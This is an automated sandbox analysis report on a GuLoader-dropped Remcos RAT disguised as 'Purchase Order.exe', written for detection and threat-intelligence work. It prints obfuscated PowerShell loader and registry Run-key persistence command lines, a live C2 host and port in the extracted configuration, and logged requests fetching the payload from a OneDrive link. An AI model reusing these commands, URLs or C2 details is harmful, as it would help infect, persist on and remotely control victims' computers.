
Windows Analysis Report
Purchase Order.exe

Overview

General Information

Sample name: Purchase Order.exe
Analysis ID: 1440304
MD5: 996cd1a4008e0fca3750e9524bd13a9d
SHA1: f202d20579ba03acb804f651bf66e2ab47add4c8
SHA256: 00473ae2a9e945343456d0193e1a5fe58c71776f42e747249a3c435b8ce7e1bb
Tags: exe

Detection

GuLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Initial sample is a PE file and has a suspicious name
Obfuscated command line found
Powershell drops PE file
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • Purchase Order.exe (PID: 2920 cmdline: "C:\Users\user\Desktop\Purchase Order.exe" MD5: 996CD1A4008E0FCA3750E9524BD13A9D)
    • powershell.exe (PID: 1492 cmdline: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4432 cmdline: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Ultradolichocephaly.exe (PID: 6008 cmdline: "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe" MD5: 996CD1A4008E0FCA3750E9524BD13A9D)
        • cmd.exe (PID: 6540 cmdline: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 1276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • reg.exe (PID: 1564 cmdline: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)" MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "abig1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "-2MBZMJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author
00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000002.00000002.2752200135.000000000B5E5000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: Ultradolichocephaly.exe PID: 6008 | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

System Summary

Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: %Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 1564, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Announces
Source: Process started | Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community | Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6540, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ProcessId: 1564, ProcessName: reg.exe
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\cmd.exe" "/c set /A 1^^0", ProcessId: 4432, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe", ParentImage: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe, ParentProcessId: 6008, ParentProcessName: Ultradolichocephaly.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Announces" /t REG_EXPAND_SZ /d "%Compressible% -windowstyle minimized $Harmlses=(Get-ItemProperty -Path 'HKCU:\Xylograferede94\').Karatenes;%Compressible% ($Harmlses)", ProcessId: 6540, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", CommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Purchase Order.exe", ParentImage: C:\Users\user\Desktop\Purchase Order.exe, ParentProcessId: 2920, ParentProcessName: Purchase Order.exe, ProcessCommandLine: "powershell.exe" -windowstyle hidden "$Encloser=Get-Content 'C:\Users\user\AppData\Local\potentially\Avantgarders\Epilogic.bac';$Gulvhjderne229=$Encloser.SubString(2901,3);.$Gulvhjderne229($Encloser)", ProcessId: 1492, ProcessName: powershell.exe
No Snort rule has matched


AV Detection

Source: Purchase Order.exe | Avira: detected
Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Source: tochisglobal.ddns.net | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Avira: detection malicious, Label: HEUR/AGEN.1331786
Source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": "tochisglobal.ddns.net:6426:1", "Assigned name": "abig1", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "-2MBZMJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source: tochisglobal.ddns.net | Virustotal: Detection: 9%
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Virustotal: Detection: 20%
Source: Purchase Order.exe | Virustotal: Detection: 20%
Source: Yara match | File source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR
Source: Purchase Order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: Purchase Order.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb@ | source: powershell.exe, 00000002.00000002.2751700296.0000000008327000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5SEA | source: powershell.exe, 00000002.00000002.2746093793.0000000002B78000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb | source: powershell.exe, 00000002.00000002.2749734497.000000000721D000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00406033 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00402688 FindFirstFileA
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_00406033 FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_004055D1 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_00402688 FindFirstFileA
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\Desktop\Purchase Order.exe | File opened: C:\Users\user\AppData

Networking

Source: Malware configuration extractor | URLs: tochisglobal.ddns.net
Source: unknown | DNS query: name: tochisglobal.ddns.net
Source: global traffic | TCP traffic: 192.168.2.5:49715 -> 103.253.17.222:6426
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 13.107.137.11
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: WIFIKU-AS-IDPTWifikuIndonesiaID
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global traffic | HTTP traffic detected: GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: onedrive.live.com Cache-Control: no-cache Cookie: MUID=02A1F39C44B160352D6AE03C40B16444
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /download?resid=7EB674A88CCF381D%21539&authkey=!AJYql7taWUIXlaI HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: onedrive.live.com Cache-Control: no-cache Cookie: MUID=02A1F39C44B160352D6AE03C40B16444
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 Host: geoplugin.net Cache-Control: no-cache
Source: global traffic | DNS traffic detected: DNS query: onedrive.live.com
Source: global traffic | DNS traffic detected: DNS query: kxwbha.am.files.1drv.com
Source: global traffic | DNS traffic detected: DNS query: tochisglobal.ddns.net
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: powershell.exe, 00000002.00000002.2749734497.00000000071DB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.micro
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpN
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpW
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpl
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpo
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/t:
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/w
Source: Ultradolichocephaly.exe, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Purchase Order.exe, 00000000.00000000.1953867569.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Purchase Order.exe, 00000000.00000002.1987821227.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3198146602.0000000000409000.00000008.00000001.01000000.00000009.sdmp | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2746622815.0000000004901000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBsq
Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2746622815.0000000004A57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kxwbha.am.files.1drv.com/
Source: Ultradolichocephaly.exe, 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kxwbha.am.files.1drv.com/4
Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kxwbha.am.files.1drv.com/D
Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2738950429.00000000078B2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kxwbha.am.files.1drv.com/pF
Source: Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078E6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://kxwbha.am.files.1drv.com/y4mpeceYAMLWx5PShbJGMk6tKW6mQBechZgu3aTbJoU6yxz1XJ53X1sSgh53U1m7pv4
Source: powershell.exe, 00000002.00000002.2748605695.0000000005966000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.0000000007828000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.00000000078A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/4w7
Source: Ultradolichocephaly.exe, 00000007.00000002.3203656499.000000000784A000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000003.2721255135.00000000078B9000.00000004.00000020.00020000.00000000.sdmp, Ultradolichocephaly.exe, 00000007.00000002.3214197333.00000000234E0000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://onedrive.live.com/download?resid=7EB674A88CCF381D%21539&authkey=
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00405086 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

E-Banking Fraud

Source: Yara match | File source: 00000007.00000003.2782489170.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.00000000078E6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.3203656499.000000000788F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Ultradolichocephaly.exe PID: 6008, type: MEMORYSTR

System Summary

Source: initial sample | Static PE information: Filename: Purchase Order.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
Source: C:\Users\user\Desktop\Purchase Order.exe | File created: C:\Windows\resources\0809
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_004048C5
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_004064CB
Source: C:\Users\user\Desktop\Purchase Order.exe | Code function: 0_2_00406CA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0446F010
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0446F8E0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_0446ECC8
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_004048C5
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_004064CB
Source: C:\Users\user\AppData\Local\Temp\Ultradolichocephaly.exe | Code function: 7_2_00406CA2
Source: Purchase Order.exe | Static PE information: invalid certificate
Source: Purchase Order.exe, 00000000.00000000.1953885414.0000000000449000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamegenanvendelsesprojekters shuntens.exeDVarFileInfo$ vs Purchase Order.exe
Source: Purchase Order.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
